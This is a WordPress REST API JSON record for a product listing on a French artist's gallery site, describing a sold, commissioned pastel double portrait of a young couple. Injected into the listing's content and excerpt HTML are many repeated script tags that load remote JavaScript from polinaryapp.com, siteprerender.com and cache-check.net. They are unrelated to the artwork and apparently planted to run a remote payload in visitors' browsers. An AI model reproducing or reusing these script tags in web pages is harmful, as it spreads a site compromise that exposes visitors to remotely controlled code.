{"id":1819,"date":"2020-12-06T14:09:57","date_gmt":"2020-12-06T13:09:57","guid":{"rendered":"https:\/\/tania-art-gallery.com\/?post_type=product&#038;p=1819"},"modified":"2020-12-06T14:14:11","modified_gmt":"2020-12-06T13:14:11","slug":"portrait-double-dun-jeune-couple-tableau-aux-pastels-secs","status":"publish","type":"product","link":"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/","title":{"rendered":"Portrait double d&rsquo;un jeune couple, tableau aux pastels secs"},"content":{"rendered":"<p><span style=\"color: #000000;\">Description longue du tableau:<\/span><\/p>\n<p><span style=\"color: #000000;\">Tableau aux pastels secs, craies et crayons et fusain<br \/>\n<\/span><\/p>\n<p><span style=\"color: #000000;\">Portrait d&rsquo;un jeune couple<\/span><\/p>\n<p><span style=\"color: #000000;\">R\u00e9alis\u00e9 sur commande d&rsquo;apr\u00e8s une photo en noir et blanc<br \/>\n<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendu encadr\u00e9 et avec un passe-partout pour pastel<\/span><\/p>\n<p><span style=\"color: #000000;\">Dimensions: 50 x 70 cm<\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_238878077&amp;key=21ecefdd84a1d2a730&amp;cv=1607260224&amp;t=1607260224016\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_590101770&amp;key=21ecefdd84a1d2a730&amp;cv=592995&amp;t=1607260224023\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607260224029\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607260426322\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"color: #000000;\">Tableau aux pastels secs, craies et crayons et fusain<\/span><\/p>\n<p><span style=\"color: #000000;\">Portrait d&rsquo;un jeune couple, r\u00e9alis\u00e9 sur commande d&rsquo;apr\u00e8s une photo en noir et blanc<\/span><\/p>\n<p><span style=\"color: #000000;\">Vendu encadr\u00e9 et avec un passe-partout pour pastel<\/span><\/p>\n<p><span style=\"color: #000000;\">Dimensions: 50 x 70 cm<\/span><\/p>\n<p><span style=\"color: #800000;\"><strong>VENDU<\/strong><\/span><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607259456999\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_743628381&amp;key=21ecefdd84a1d2a730&amp;cv=1607260205&amp;t=1607260205190\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607260205196\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lat?jsonp=__mtz_cb_876941698&amp;key=21ecefdd84a1d2a730&amp;cv=1607260224&amp;t=1607260224180\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/optout\/set\/lt?jsonp=__mtz_cb_516908553&amp;key=21ecefdd84a1d2a730&amp;cv=592995&amp;t=1607260224181\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607260224188\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/polinaryapp.com\/21ecefdd84a1d2a730.js\"><\/script><script src=\"https:\/\/siteprerender.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8684x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cache-check.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8684x&amp;format=arrjs&amp;r=1607260426472\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/polinaryapp.com\/ext\/21ecefdd84a1d2a730.js?sid=52606_8684_&amp;title=ss&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":0,"template":"","meta":{"spay_email":""},"class_list":{"0":"post-1819","1":"product","2":"type-product","3":"status-publish","4":"hentry","5":"product_cat-tableau-sur-commande","7":"entry","8":"owp-thumbs-layout-horizontal","9":"owp-btn-normal","10":"owp-tabs-layout-vertical","11":"has-no-thumbnails","12":"has-product-nav"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Portrait double d&#039;un jeune couple, tableau aux pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Portrait double d&#039;un jeune couple, tableau aux pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"og:description\" content=\"Tableau aux pastels secs, craies et crayons et fusain  Portrait d&#039;un jeune couple, r\u00e9alis\u00e9 sur commande d&#039;apr\u00e8s une photo en noir et blanc  Vendu encadr\u00e9 et avec un passe-partout pour pastel  Dimensions: 50 x 70 cm  VENDU\" \/>\n<meta property=\"og:url\" content=\"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/\" \/>\n<meta property=\"og:site_name\" content=\"Les Arts de Tania KMIT - dessin - pastel - gravure\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-06T13:14:11+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/\",\"url\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/\",\"name\":\"Portrait double d'un jeune couple, tableau aux pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure\",\"isPartOf\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#website\"},\"datePublished\":\"2020-12-06T13:09:57+00:00\",\"dateModified\":\"2020-12-06T13:14:11+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/tania-art-gallery.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/tania-art-gallery.com\/index.php\/boutique\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Portrait double d&rsquo;un jeune couple, tableau aux pastels secs\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/tania-art-gallery.com\/#website\",\"url\":\"https:\/\/tania-art-gallery.com\/\",\"name\":\"Les Arts de Tania KMIT - dessin - pastel - gravure\",\"description\":\"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture\",\"publisher\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/tania-art-gallery.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a\",\"name\":\"admin9071\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"contentUrl\":\"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png\",\"width\":171,\"height\":270,\"caption\":\"admin9071\"},\"logo\":{\"@id\":\"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/tania-art-gallery.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Portrait double d'un jeune couple, tableau aux pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/","og_locale":"fr_FR","og_type":"article","og_title":"Portrait double d'un jeune couple, tableau aux pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure","og_description":"Tableau aux pastels secs, craies et crayons et fusain  Portrait d'un jeune couple, r\u00e9alis\u00e9 sur commande d'apr\u00e8s une photo en noir et blanc  Vendu encadr\u00e9 et avec un passe-partout pour pastel  Dimensions: 50 x 70 cm  VENDU","og_url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/","og_site_name":"Les Arts de Tania KMIT - dessin - pastel - gravure","article_modified_time":"2020-12-06T13:14:11+00:00","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/","url":"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/","name":"Portrait double d'un jeune couple, tableau aux pastels secs - Les Arts de Tania KMIT - dessin - pastel - gravure","isPartOf":{"@id":"https:\/\/tania-art-gallery.com\/#website"},"datePublished":"2020-12-06T13:09:57+00:00","dateModified":"2020-12-06T13:14:11+00:00","breadcrumb":{"@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/tania-art-gallery.com\/index.php\/produit\/portrait-double-dun-jeune-couple-tableau-aux-pastels-secs\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/tania-art-gallery.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/tania-art-gallery.com\/index.php\/boutique\/"},{"@type":"ListItem","position":3,"name":"Portrait double d&rsquo;un jeune couple, tableau aux pastels secs"}]},{"@type":"WebSite","@id":"https:\/\/tania-art-gallery.com\/#website","url":"https:\/\/tania-art-gallery.com\/","name":"Les Arts de Tania KMIT - dessin - pastel - gravure","description":"Un site pour les amateurs d&#039;arts: dessin, pastel, gravure, aquarelle, peinture","publisher":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/tania-art-gallery.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":["Person","Organization"],"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/4090feae07c792e9f804093d64a2d00a","name":"admin9071","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/","url":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","contentUrl":"https:\/\/tania-art-gallery.com\/wp-content\/uploads\/2020\/11\/cropped-logo-vignette6-2.png","width":171,"height":270,"caption":"admin9071"},"logo":{"@id":"https:\/\/tania-art-gallery.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/tania-art-gallery.com"]}]}},"_links":{"self":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product\/1819","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"wp:attachment":[{"href":"https:\/\/tania-art-gallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=1819"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}